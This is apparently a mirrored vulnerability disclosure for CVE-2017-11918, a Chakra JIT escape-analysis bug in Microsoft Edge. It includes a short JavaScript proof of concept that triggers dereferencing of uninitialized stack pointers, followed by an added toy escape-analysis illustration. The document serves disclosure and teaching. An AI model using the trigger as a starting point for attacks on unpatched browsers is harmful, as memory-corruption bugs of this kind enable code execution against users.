
Microsoft Edge Chakra JIT Escape Analysis Bug


Microsoft Edge Chakra fails to detect that "tmp" escapes its scope and allocates it on the stack. This may lead to dereferencing uninitialized stack values.


MD5 | f49a75546e986ccb23882860abd5f185

Microsoft Edge: Chakra: JIT: Escape analysis bug 

CVE-2017-11918


Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis

Chakra fails to detect that "tmp" escapes its scope and allocates it on the stack. This may lead to dereferencing uninitialized stack values.

PoC:
function opt() {
    let tmp = [];
    tmp[0] = tmp;   // tmp is stored into itself, so tmp[0] aliases tmp
    return tmp[0];  // returns tmp itself; the JIT misses this escape
}

function main() {
    // warm up opt() so the JIT compiles it with tmp placed on the stack
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }

    print(opt()); // deref uninitialized stack pointers!
}

main();
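As an added illustration (not part of the report or of Chakra's own code), the following toy escape analysis runs over a hand-built IR for opt(); the IR shape, the variable names and the two analysis variants are constructed for this example. It shows why a store of an object into one of its own fields must feed back into what a later load from that field can return:

```javascript
// Toy escape analysis over a constructed IR modelling opt() from the PoC.
// An allocation escapes if it can be reached after the function returns:
// via a returned value, a call argument, or a store into a heap object.
// The unsound variant ignores what is stored into fields of a candidate
// object, so the load tmp[0] yields an "unknown" value and the return of
// that value is missed; the sound variant tracks field contents.

// IR for: let tmp = []; tmp[0] = tmp; return tmp[0];
const optIR = [
  { op: 'alloc', dst: 'tmp' },
  { op: 'store', obj: 'tmp', val: 'tmp' }, // tmp[0] = tmp
  { op: 'load', dst: 'r', obj: 'tmp' },    // r = tmp[0]
  { op: 'ret', val: 'r' },
];

// Returns the set of allocations that must stay on the heap.
function escapingAllocs(ir, { trackFieldContents }) {
  const pointsTo = new Map(); // variable -> Set of allocations it may name
  const contents = new Map(); // allocation -> Set of allocations stored in it
  const escapes = new Set();
  const refs = (v) => pointsTo.get(v) || new Set();
  // Escaping is transitive: whatever is stored in an escaped object escapes.
  const markEscape = (a) => {
    const work = [a];
    while (work.length) {
      const x = work.pop();
      if (escapes.has(x)) continue;
      escapes.add(x);
      work.push(...contents.get(x));
    }
  };
  for (const ins of ir) {
    if (ins.op === 'alloc') {
      pointsTo.set(ins.dst, new Set([ins.dst]));
      contents.set(ins.dst, new Set());
    } else if (ins.op === 'store') {
      const heapTarget = !pointsTo.has(ins.obj); // e.g. a global object
      for (const v of refs(ins.val)) {
        if (heapTarget) markEscape(v);
        for (const o of refs(ins.obj)) {
          contents.get(o).add(v);
          if (escapes.has(o)) markEscape(v);
        }
      }
    } else if (ins.op === 'load') {
      const out = new Set();
      if (trackFieldContents) for (const o of refs(ins.obj)) for (const v of contents.get(o)) out.add(v);
      pointsTo.set(ins.dst, out);
    } else if (ins.op === 'ret' || ins.op === 'call') {
      for (const v of refs(ins.val)) markEscape(v);
    }
  }
  return escapes;
}
```

With trackFieldContents false, tmp is reported as non-escaping and would be placed on the stack while a pointer to it is returned; with it true, tmp is correctly kept on the heap.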



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


